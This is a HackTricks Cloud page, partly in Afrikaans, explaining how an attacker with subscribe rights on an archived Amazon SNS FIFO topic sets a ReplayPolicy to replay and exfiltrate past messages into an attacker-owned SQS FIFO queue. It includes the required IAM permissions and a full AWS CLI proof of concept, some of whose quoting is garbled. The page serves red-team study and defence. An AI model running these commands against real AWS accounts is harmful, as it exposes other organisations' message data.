Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Kyk na die subskripsie planne!

Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.

Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Misbruik van Amazon SNS FIFO topic message archiving om previously published messages te replay en exfiltrate na ’n attacker-controlled SQS FIFO queue deur die subscription ReplayPolicy te stel.

Service: Amazon SNS (FIFO topics) + Amazon SQS (FIFO queues)
Requirements: Topic must have ArchivePolicy enabled (message archiving). Attacker can Subscribe to the topic and set attributes on their subscription. Attacker controls an SQS FIFO queue and allows the topic to send messages.
Impact: Historical messages (published before the subscription) can be delivered to the attacker endpoint. Replayed deliveries are flagged with Replayed=true in the SNS envelope.

Voorvereistes

SNS FIFO topic with archiving enabled: ArchivePolicy (e.g., { "MessageRetentionPeriod": "2" } for 2 days).
Attacker has permissions to:
- sns:Subscribe on the target topic.
- sns:SetSubscriptionAttributes on the created subscription.
Attacker has an SQS FIFO queue and can attach a queue policy allowing sns:SendMessage from the topic ARN.

Minimale IAM-permissies

On topic: sns:Subscribe.
On subscription: sns:SetSubscriptionAttributes.
On queue: sqs:SetQueueAttributes for policy, and queue policy permitting sns:SendMessage from the topic ARN.

Aanval: Replay archived messages to attacker SQS FIFO

Die attacker subscribe hulle SQS FIFO queue aan die victim SNS FIFO topic, en stel dan die ReplayPolicy na ’n timestamp in die verlede (binne die archive retention window). SNS replay onmiddellik die ooreenstemmende archived messages na die nuwe subscription en merk hulle met Replayed=true.

Notes:

The timestamp used in ReplayPolicy must be >= the topic’s BeginningArchiveTime. If it’s earlier, the API returns Invalid StartingPoint value.
For SNS FIFO Publish, you must specify a MessageGroupId (and either dedup ID or enable ContentBasedDeduplication).

End-to-end CLI POC (us-east-1)

```bash REGION=us-east-1 # Compute a starting point; adjust later to >= BeginningArchiveTime if needed TS_START=$(python3 - << 'PY' from datetime import datetime, timezone, timedelta print((datetime.now(timezone.utc) - timedelta(minutes=15)).strftime('%Y-%m-%dT%H:%M:%SZ')) PY )

TOPIC_NAME=htreplay$(date +%s).fifo TOPIC_ARN=$(aws sns create-topic –region “$REGION”
–cli-input-json ‘{“Name”:“’”$TOPIC_NAME“‘“,“Attributes”:{“FifoTopic”:“true”,“ContentBasedDeduplication”:“true”,“ArchivePolicy”:“{"MessageRetentionPeriod":"2"}”}}’
–query TopicArn –output text)

echo “Topic: $TOPIC_ARN”

2) Publish a few messages BEFORE subscribing (FIFO requires MessageGroupId)

for i in $(seq 1 3); do aws sns publish –region “$REGION” –topic-arn “$TOPIC_ARN”
–message “{"orderId":$i,"secret":"ssn-123-45-678$i"}”
–message-group-id g1 >/dev/null done

3) Create attacker SQS FIFO queue and allow only this topic to send

Q_URL=$(aws sqs create-queue –queue-name ht-replay-exfil-q-$(date +%s).fifo
–attributes FifoQueue=true –region “$REGION” –query QueueUrl –output text) Q_ARN=$(aws sqs get-queue-attributes –queue-url “$Q_URL” –region “$REGION”
–attribute-names QueueArn –query Attributes.QueueArn –output text)

cat > /tmp/ht-replay-sqs-policy.json <<JSON {“Version”:“2012-10-17”,“Statement”:[{“Sid”:“AllowSNSSend”,“Effect”:“Allow”,“Principal”:{“Service”:“sns.amazonaws.com”},“Action”:“sqs:SendMessage”,“Resource”:“$Q_ARN”,“Condition”:{“ArnEquals”:{“aws:SourceArn”:“$TOPIC_ARN”}}}]} JSON

Use CLI input JSON to avoid quoting issues

aws sqs set-queue-attributes –region “$REGION” –cli-input-json “$(python3 - << ‘PY’ import json, os print(json.dumps({ ‘QueueUrl’: os.environ[‘Q_URL’], ‘Attributes’: {‘Policy’: open(‘/tmp/ht-replay-sqs-policy.json’).read()} })) PY )”

SUB_ARN=$(aws sns subscribe –region “$REGION” –topic-arn “$TOPIC_ARN”
–protocol sqs –notification-endpoint “$Q_ARN” –query SubscriptionArn –output text)

echo “Subscription: $SUB_ARN”

5) Ensure StartingPoint is >= BeginningArchiveTime

BEGIN=$(aws sns get-topic-attributes –region “$REGION” –topic-arn “$TOPIC_ARN” –query Attributes.BeginningArchiveTime –output text) START=${TS_START} if [ -n “$BEGIN” ]; then START=“$BEGIN”; fi

aws sns set-subscription-attributes –region “$REGION” –subscription-arn “$SUB_ARN”
–attribute-name ReplayPolicy
–attribute-value “{"PointType":"Timestamp","StartingPoint":"$START"}”

aws sqs receive-message –queue-url “$Q_URL” –region “$REGION”
–max-number-of-messages 10 –wait-time-seconds 10
–message-attribute-names All –attribute-names All

</details>

## Impak
**Potensiële Impak**: ’n Aanvaller wat op ’n SNS FIFO topic kan inteken met argivering geaktiveer, en `ReplayPolicy` op hul subscription kan stel, kan onmiddellik historiese boodskappe wat na daardie topic gepubliseer is, herspeel en eksfiltreer — nie net boodskappe wat ná die skepping van die subscription gestuur is nie. Afgelewerde boodskappe sluit ’n `Replayed=true` vlag in die SNS-envelope in.

> [!TIP]
> Leer en oefen AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Leer en oefen GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Leer en oefen Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Ondersteun HackTricks</summary>
>
> - Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
> - **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>